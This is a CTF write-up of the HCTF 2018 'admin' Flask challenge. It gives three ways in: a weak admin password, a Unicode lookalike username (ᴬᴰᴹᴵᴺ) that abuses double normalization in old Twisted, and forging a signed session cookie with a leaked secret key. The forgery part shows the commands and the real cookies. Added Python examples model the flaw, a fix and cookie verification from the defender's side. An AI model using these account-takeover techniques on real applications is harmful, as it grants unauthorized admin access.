Challenge address: https://buuoj.cn/challenges#[HCTF%202018]admin
The first solution: weak password
Following the hint, try a weak password to log in as admin. With username admin and password 123, the login succeeds.
The second solution: Unicode spoofing
Register a random user mochu7 and open Change Password; the page source points to the challenge's source code at /hctf_flask/app/routes.py.
Both the register and login routes pass the username through a custom function strlower(), which uses nodeprep.prepare(), imported from
from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep
In requirements.txt the Twisted version can be seen: Twisted 10.2.0, while the current (2020/10/28) latest Twisted release is 20.3.0. So a very old version is used here, and in the 10.2.0 version nodeprep.prepare() turns certain special Unicode characters into ordinary characters after processing.
Use the following site to find special Unicode encodings of admin:
https://unicode-table.com/en/search/?q=Modifier+Letter+Capital
ᴬᴰᴹᴵᴺ
Unicode encoding: \u1d2c\u1d30\u1d39\u1d35\u1d3a
After two passes through nodeprep.prepare() these characters give admin.
So you can register the account ᴬᴰᴹᴵᴺ: nodeprep.prepare() runs once at registration and yields ADMIN, then runs a second time when you change the password and yields admin, so the password you set is applied to the admin account.
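To make the normalization behaviour concrete, here is an added Python example (not code from the writeup, the challenge, or Twisted) that models the two-pass behaviour described above with the standard library: the first pass only turns the modifier capitals into ASCII capitals, the second lowercases them. old_style_prepare() is my model of what the writeup observes (lowercase, then NFKC), not Twisted's own implementation, and the user set is constructed. The example also shows the defensive fix: apply NFKC and casefold exactly once, store that canonical form, and reject any registration whose canonical form collides with an existing account, so a later re-normalization can never map a name onto a different user.

```python
import unicodedata

# Constructed sample input: the lookalike from the writeup,
# U+1D2C U+1D30 U+1D39 U+1D35 U+1D3A (MODIFIER LETTER CAPITAL A/D/M/I/N).
LOOKALIKE_ADMIN = "\u1d2c\u1d30\u1d39\u1d35\u1d3a"  # renders as ᴬᴰᴹᴵᴺ


def old_style_prepare(name: str) -> str:
    """Model (an assumption, not Twisted's code) of the behaviour the writeup
    describes for nodeprep.prepare() in Twisted 10.2.0: lowercase first, then
    NFKC. Modifier capitals have no lowercase mapping, so the first pass only
    decomposes them to ASCII capitals; a second pass then lowercases those."""
    return unicodedata.normalize("NFKC", name.lower())


def trace_two_passes(name: str) -> list:
    """Return [input, after first prepare, after second prepare]."""
    first = old_style_prepare(name)
    second = old_style_prepare(first)
    return [name, first, second]


def canonical_username(name: str) -> str:
    """Defensive canonical form: NFKC *then* casefold, applied exactly once.
    The result is a fixed point (normalizing it again changes nothing), so
    storing and comparing this value closes the double-processing gap."""
    return unicodedata.normalize("NFKC", name).casefold()


def register(name: str, users: set) -> str:
    """Register a user under its canonical name; refuse collisions with
    existing accounts. `users` stands in for the challenge's user table."""
    canon = canonical_username(name)
    if canon in users:
        raise ValueError(f"username {name!r} collides with existing account {canon!r}")
    users.add(canon)
    return canon


if __name__ == "__main__":
    print(trace_two_passes(LOOKALIKE_ADMIN))  # ['ᴬᴰᴹᴵᴺ', 'ADMIN', 'admin']
    table = {"admin", "mochu7"}  # constructed user table
    try:
        register(LOOKALIKE_ADMIN, table)
    except ValueError as err:
        print("rejected:", err)
```

Note that canonical_username() is idempotent, which is exactly the property the vulnerable flow lacks: the name compared at login, at registration and at password change is always the same string, whichever step computes it.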
The third solution: forged Flask session
As we all know, the Flask session is stored in the client's cookie. It is not encrypted; it is only signed to prevent tampering.
User mochu7's session, decoded with flask_session_cookie_manager3.py:
PS D:\Tools\Web\flask-session-cookie-manager> python .\flask_session_cookie_manager3.py decode -s 'ckj123' -c '.eJw9kMGKwkAQRH9l6bOHZOKyEPAQGM0a6A66o2HmIm6MTjqJQlQ0I_77Di54rup61fWAzb6vzhbiS3-tRrCpdxA_4OMXYtAi68gtHLrVXatVoDvtTLpu8pQsMgYocEyy_DRS30w6HbwvJLYWpRakDoNJMcrlNPC3Y-Ilo0oEKtvkcteimN5R6MhIjIzSAfEiIJcMJG2rO89kdMSJ88SGipUj1XhvxoYzRrmsUZbOyEXo85gUTuA5gvLc7zeXU1Md3y-Q8-iUWizmg-FZ7XF38nXQrVvkxNfKau3KEFnfSMwdFhjpw-QVV3fbQ_VOUt-znyL5V47bzgvQnUp7_YIRXM9V_xoOwgCef1nZbOI.X5k9pg.ErECKkJ7jz7qU_-NGQSWFDgTq98'
{'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'mochu7', 'user_id': '10'}
Forging the session also requires the secret key, which can be found by searching the source code folder globally: the secret key is ckj123.
Change name to admin:
{'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'admin', 'user_id': '10'}
Encoding it yields admin's session:
PS D:\Tools\Web\flask-session-cookie-manager> python .\flask_session_cookie_manager3.py encode -s 'ckj123' -t "{'_fresh': True, '_id': b'cbf743351a54bf3ded8ca2343c8479d60da235568a066582dc7814a5864c10618d87e3a13f7d37e6464470248ebd3233603c6d5e3597d2cf2c04b073d4518c53', 'csrf_token': b'7584ce1b2f1bd3155835e20862bc752607b31c7b', 'image': b'LqRX', 'name': 'admin', 'user_id': '10'}"
.eJw9kMGKwkAQRH9l6bOHZOJeBA-B0ayBbtEdDTOX4MZo0klciIqmxX_fwQXPVV2vuh6QH_ryXMHk0l_LEeT1HiYP-PiBCViVdiQrQdncrdkEtrPikm2zTKhCxgAVjkkXn07bm0tmg_eFxFWF2ioyx8ElGC31LPC3Y-I1o4kVmqpZ6n2LanZHZSOnMXLGBsSrgCQeSFet7TyTUYhj8cSGso2Qabw3Zccpo17XqAtxehX6PCaDU3iOoDj3h_zy25Sn9wskHp1Qi9licDyvPe5Ovg7KtkWOfa20tlKEyPZGaiGYYWSP01dc3e2O5TvJfM2_s_hfOe06L8Bu39UnGMH1XPav3SAM4PkH7IhsmA.X5k-3w.1NeZXj_XVt-fu-MQxsTtdPuBZws
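The following Python example is added here and is neither the writeup's nor flask-session-cookie-manager's code. It re-implements the Flask session cookie format with the standard library only, following the itsdangerous URLSafeTimedSerializer layout Flask uses (a base64 JSON payload, zlib-compressed and prefixed with "." when that saves space; a base64 timestamp; and an HMAC-SHA1 over both under a key derived from the secret with the salt "cookie-session"). It uses plain JSON rather than Flask's tagged JSON, so bytes values such as _id would appear as strings here; DEMO_SECRET and the session dict are constructed. It shows the third solution from the defender's side: the payload is readable without any key, editing the payload without the key breaks the signature, and with the key any payload verifies, so the secrecy and strength of the key are the whole protection.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

# Constructed demo key; NOT the challenge's key (that one is quoted in the writeup).
DEMO_SECRET = "demo-secret-for-illustration"
SALT = b"cookie-session"  # salt Flask passes to its session cookie signer


def _b64e(data: bytes) -> str:
    """URL-safe base64 without '=' padding, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _derived_key(secret: str) -> bytes:
    """itsdangerous 'hmac' key derivation: HMAC-SHA1(secret, salt)."""
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()


def _encode_payload(data: dict) -> str:
    """JSON, zlib-compressed only when that saves space (leading '.' marks it)."""
    raw = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    packed = zlib.compress(raw)
    if len(packed) < len(raw) - 1:
        return "." + _b64e(packed)
    return _b64e(raw)


def _signature(secret: str, value: str) -> str:
    return _b64e(hmac.new(_derived_key(secret), value.encode(), hashlib.sha1).digest())


def sign_session(data: dict, secret: str, ts: Optional[int] = None) -> str:
    """Produce a cookie of the form <payload>.<timestamp>.<signature>."""
    ts = int(time.time()) if ts is None else ts
    ts_part = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    value = f"{_encode_payload(data)}.{ts_part}"
    return f"{value}.{_signature(secret, value)}"


def read_payload(cookie: str) -> dict:
    """Read the session contents with NO key: the payload is encoded, not encrypted."""
    body = cookie.rsplit(".", 2)[0]
    raw = zlib.decompress(_b64d(body[1:])) if body.startswith(".") else _b64d(body)
    return json.loads(raw)


def replace_payload(cookie: str, data: dict) -> str:
    """Swap the payload but keep the old timestamp and signature (a tamper attempt)."""
    _, ts_part, sig_part = cookie.rsplit(".", 2)
    return f"{_encode_payload(data)}.{ts_part}.{sig_part}"


def verify_session(cookie: str, secret: str) -> Optional[dict]:
    """Return the session dict if the signature is valid under `secret`, else None."""
    body, ts_part, sig_part = cookie.rsplit(".", 2)
    expected = _signature(secret, f"{body}.{ts_part}")
    if not hmac.compare_digest(expected.encode(), sig_part.encode()):
        return None
    return read_payload(cookie)


if __name__ == "__main__":
    session = {"_fresh": True, "name": "mochu7", "user_id": "10"}  # constructed
    cookie = sign_session(session, DEMO_SECRET)
    print("readable without key :", read_payload(cookie))
    print("valid under real key :", verify_session(cookie, DEMO_SECRET) is not None)
    print("valid under wrong key:", verify_session(cookie, "guess") is not None)
    tampered = replace_payload(cookie, {**session, "name": "admin"})
    print("tampered still valid :", verify_session(tampered, DEMO_SECRET) is not None)
```

read_payload() applied to the mochu7 cookie shown above recovers the same dict the tool printed, because decoding needs no key; only verify_session() does. Signing with the timestamp 1603878310 reproduces the "X5k9pg" middle segment seen in the cookies above, which is how a responder can date a captured session.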